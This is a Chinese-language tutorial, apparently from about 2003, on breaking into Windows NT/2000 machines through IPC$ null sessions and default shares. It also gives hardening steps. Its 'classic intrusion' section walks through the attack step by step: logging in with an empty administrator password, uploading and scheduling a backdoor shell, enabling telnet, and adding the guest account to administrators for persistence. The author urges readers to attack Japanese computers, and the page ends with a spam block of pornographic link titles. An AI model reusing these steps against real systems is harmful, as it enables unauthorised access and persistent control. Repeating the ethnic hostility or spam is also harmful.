一份詳盡的IPC$入侵資料

      一 嘮叨一下:
      網上關于ipc$入侵的文章可謂多如牛毛,而且也不乏優秀之作,攻擊步驟甚至可以說已經成為經典的模式,因此也沒人愿意再把這已經成為定式的東西拿出來擺弄.
      不過話雖這樣說,但我個人認為這些文章講解的并不詳細,對于第一次接觸ipc$的菜鳥來說,簡單的羅列步驟并不能解答他們的許多迷惑(你隨便找一個hack論壇搜一下ipc,看存在的疑惑有多少).
      因此我寫了這篇相當于解惑的教程.想把一些容易混淆,容易迷惑人的問題說清楚,讓大家不要總徘徊在原地!如果你看完這篇帖子仍有疑問,請馬上回復!


      二 什么是ipc$
      IPC$(Internet Process Connection)是共享"命名管道"的資源(大家都是這么說的),它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。
      利用IPC$,連接者甚至可以與目標主機建立一個空的連接而無需用戶名與密碼(當然,對方機器必須開了ipc$共享,否則你是連接不上的),而利用這個空的連接,連接者還可以得到目標主機上的用戶列表(不過負責的管理員會禁止導出用戶列表的)。
      我們總在說ipc$漏洞ipc$漏洞,其實,ipc$并不是真正意義上的漏洞,它是為了方便管理員的遠程管理而開放的遠程網絡登陸功能,而且還打開了默認共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$)。
      所有的這些,初衷都是為了方便管理員的管理,但好的初衷并不一定有好的收效,一些別有用心者(到底是什么用心?我也不知道,代詞一個)會利用IPC$,訪問共享資源,導出用戶列表,并使用一些字典工具,進行密碼探測,寄希望于獲得更高的權限,從而達到不可告人的目的.

      解惑:
      1)IPC連接是Windows NT及以上系統中特有的遠程網絡登陸功能,其功能相當于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函數,所以不能在Windows 9.x中運行。
      也就是說只有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友說在98下能建立空的連接,不知道是真是假,不過現在都2003年了,建議98的同志換一下系統吧,98不爽的)
      2)即使是空連接也不是100%都能建立成功,如果對方關閉了ipc$共享,你仍然無法建立連接
      3)并不是說建立了ipc$連接就可以查看對方的用戶列表,因為管理員可以禁止導出用戶列表


      三 建立ipc$連接在hack攻擊中的作用
      就像上面所說的,即使你建立了一個空的連接,你也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),訪問部分共享,如果你能夠以某一個具有一定權限的用戶身份登陸的話,那么你就會得到相應的權限,顯然,如果你以管理員身份登陸,嘿嘿,就不用我在多說了吧,what u want,u can do!!
      (基本上可以總結為獲取目標信息、管理目標進程和服務,上傳木馬并運行,如果是2000server,還可以考慮開啟終端服務方便控制.怎么樣?夠厲害吧!)
      不過你也不要高興的太早,因為管理員的密碼不是那么好搞到的,雖然會有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數,而且現在不比從前了,隨著人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼會越來越難的
      因此今后你最大的可能就是以極小的權限甚至是沒有權限進行連接,你會慢慢的發現ipc$連接并不是萬能的,甚至在主機不開啟ipc$共享時,你根本就無法連接.
      所以我認為,你不要把ipc$入侵當作終極武器,不要認為它戰無不勝,它就像是足球場上射門前的傳球,很少會有致命一擊的效果,但卻是不可缺少的,我覺得這才是ipc$連接在hack入侵中的意義所在.


      四 ipc$與空連接,139,445端口,默認共享的關系
      以上四者的關系可能是菜鳥很困惑的一個問題,不過大部分文章都沒有進行特別的說明,其實我理解的也不是很透徹,都是在與大家交流中總結出來的.(一個有良好討論氛圍的BBS可以說是菜鳥的天堂)

      1)ipc$與空連接:
      不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個用戶或管理員的身份登陸(即以特定的用戶名和密碼進行ipc$連接),自然就不能叫做空連接了.
      許多人可能要問了,既然可以空連接,那我以后就空連接好了,為什么還要費九牛二虎之力去掃描弱口令,呵呵,原因前面提到過,當你以空連接登陸時,你沒有任何權限(很郁悶吧),而你以用戶或管理員的身份登陸時,你就會有相應的權限(有權限誰不想呀,所以還是老老實實掃吧,不要偷懶喲).
      2)ipc$與139,445端口:
      ipc$連接可以實現遠程登陸及對默認共享的訪問;而139端口的開啟表示netbios協議的應用,我們可以通過139,445(win2000)端口實現對共享文件/打印機的訪問,因此一般來講,ipc$連接是需要139或445端口來支持的.
      3)ipc$與默認共享
      默認共享是為了方便管理員遠程管理而默認開啟的共享(你當然可以關閉它),即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),我們通過ipc$連接可以實現對這些默認共享的訪問(前提嵌苑矯揮泄乇照廡┠瞎蠶?


      五 ipc$連接失敗的原因
      以下5個原因是比較常見的:
      1)你的系統不是NT或以上操作系統;
      2)對方沒有打開ipc$默認共享
      3)對方未開啟139或445端口(惑被防火墻屏蔽)
      4)你的命令輸入有誤(比如缺少了空格等)
      5)用戶名或密碼錯誤(空連接當然無所謂了)
      另外,你也可以根據返回的錯誤號分析原因:
      錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員權限的,先提升權限;
      錯誤號51,Windows 無法找到網絡路徑 : 網絡有問題;
      錯誤號53,找不到網絡路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火墻(端口過濾);
      錯誤號67,找不到網絡名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;
      錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連。
      錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;
      錯誤號1792,試圖登錄,但是網絡登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況)
      錯誤號2242,此用戶的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。
      關于ipc$連不上的問題比較復雜,除了以上的原因,還會有其他一些不確定因素,在此本人無法詳細而確定的說明,就靠大家自己體會和試驗了.


      六 如何打開目標的IPC$(此段引自相關文章)
      首先你需要獲得一個不依賴于ipc$的shell,比如sql的cmd擴展、telnet、木馬,當然,這shell必須是admin權限的,然后你可以使用shell執行命令 net share ipc$ 來開放目標的ipc$。從上面可以知道,ipc$能否使用還有很多條件。請確認相關服務都已運行,沒有就啟動它(不知道怎么做的請看net命令的用法),還是不行的話(比如有防火墻,殺不了)建議放棄。


      七 如何防范ipc$入侵
      1禁止空連接進行枚舉(此操作并不能阻止空連接的建立,引自《解剖win2000下的空會話》)
      首先運行regedit,找到如下組建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:00000001(如果設置為2的話,有一些問題會發生,比如一些WIN的服務出現問題等等)

      2禁止默認共享
      1)察看本地共享資源
      運行-cmd-輸入net share
      2)刪除共享(每次輸入一個)
      net share ipc$ /delete
      net share admin$ /delete
      net share c$ /delete
      net share d$ /delete(如果有e,f,……可以繼續刪除)
      3)停止server服務
      net stop server /y (重新啟動后server服務會重新開啟)
      4)修改注冊表
      運行-regedit
      server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改為:00000000。
      pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改為:00000000。
      如果上面所說的主鍵不存在,就新建(右擊-新建-雙字節值)一個主健再改鍵值。

      3永久關閉ipc$和默認共享依賴的服務:lanmanserver即server服務
      控制面板-管理工具-服務-找到server服務(右擊)-屬性-常規-啟動類型-已禁用

      4安裝防火墻(選中相關設置),或者端口過濾(濾掉139,445等),或者用新版本的優化大師

      5設置復雜密碼,防止通過ipc$窮舉密碼


      (本教程不定期更新,欲獲得最新版本,請登陸官方網站:菜菜鳥社區原創http://ccbirds.yeah.net)


      八 相關命令
      1)建立空連接:
      net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)

      2)建立非空連接:
      net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)

      3)映射默認共享:
      net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
      如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$

      4)刪除一個ipc$連接
      net use \\IP\ipc$ /del

      5)刪除共享映射
      net use c: /del 刪除映射的c盤,其他盤類推
      net use * /del 刪除全部,會有提示要求按y確認


      九 經典入侵模式
      這個入侵模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創作者!(不知道是哪位前輩)

      1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
      這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,后面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
        
      2. C:\>copy srv.exe \\127.0.0.1\admin$
      先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什么地方去了)。
        
      3. C:\>net time \\127.0.0.1
      查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
        
      4. C:\>at \\127.0.0.1 11:05 srv.exe
      用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎么啟動啊,呵呵!)
        
      5. C:\>net time \\127.0.0.1
      再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就準備開始下面的命令。
        
      6. C:\>telnet 127.0.0.1 99
      這里會用到Telnet命令吧,注意端口是99。Telnet默認的是23端口,但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。
      雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
        
      7.C:\>copy ntlm.exe \\127.0.0.1\admin$
      用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
        
      8. C:\WINNT\system32>ntlm
      輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然后使用"net start telnet"來開啟Telnet服務!

      9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然后你想做什么?想做什么就做什么吧,哈哈)

      為了以防萬一,我們再把guest激活加到管理組
      10. C:\>net user guest /active:yes
      將對方的Guest用戶激活

      11. C:\>net user guest 1234
      將Guest的密碼改為1234,或者你要設定的密碼

      12. C:\>net localgroup administrators guest /add
      將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這臺計算機)


      十 總結:
      關于ipc入侵就說這么多了,覺得已經夠詳細了,如果有不準確的地方,希望能與大家討論.
      最后,希望大家不要隨便入侵,我寫這篇文章的目的是想解答大家的疑惑,并不是鼓勵大家隨便的入侵,如果你非想試一下,建議拿小日本的機子開練(什么?為什么?因為我討厭日本,沒別的)
       
      上一條:IIS使用10則
      下一條:局域網無法訪問
      北大青鳥網上報名
      北大青鳥招生簡章
      主站蜘蛛池模板: 精品成人av一区二区三区| 夜色福利一区二区三区| 国产裸体歌舞一区二区| 亚洲丰满熟女一区二区哦| 亚洲熟女一区二区三区| 久久无码一区二区三区少妇| 国产福利无码一区在线| 亚洲av成人一区二区三区观看在线 | 无码中文字幕一区二区三区| 久久精品道一区二区三区| 红桃AV一区二区三区在线无码AV | 亚洲国产福利精品一区二区| 亚洲国产精品一区二区九九| 天码av无码一区二区三区四区| 日韩在线观看一区二区三区| 国产精品99精品一区二区三区| 国产美女一区二区三区| 中文字幕无线码一区二区| 午夜影院一区二区| 亚洲综合一区国产精品| 欧美av色香蕉一区二区蜜桃小说| 国产成人一区二区三中文| 午夜福利无码一区二区| 国产SUV精品一区二区四| 国产精品盗摄一区二区在线| 国产亚洲福利精品一区二区| 国产丝袜一区二区三区在线观看 | 亚洲男人的天堂一区二区| 动漫精品专区一区二区三区不卡| 精品国产日韩一区三区| 一区二区不卡视频在线观看| 中文字幕亚洲一区二区三区| 精品日产一区二区三区手机| 日韩人妻不卡一区二区三区| 亚洲国产福利精品一区二区| 在线|一区二区三区| 国产成人精品一区二三区在线观看| www.亚洲一区| 无码精品久久一区二区三区| 三上悠亚一区二区观看| 精品无人区一区二区三区|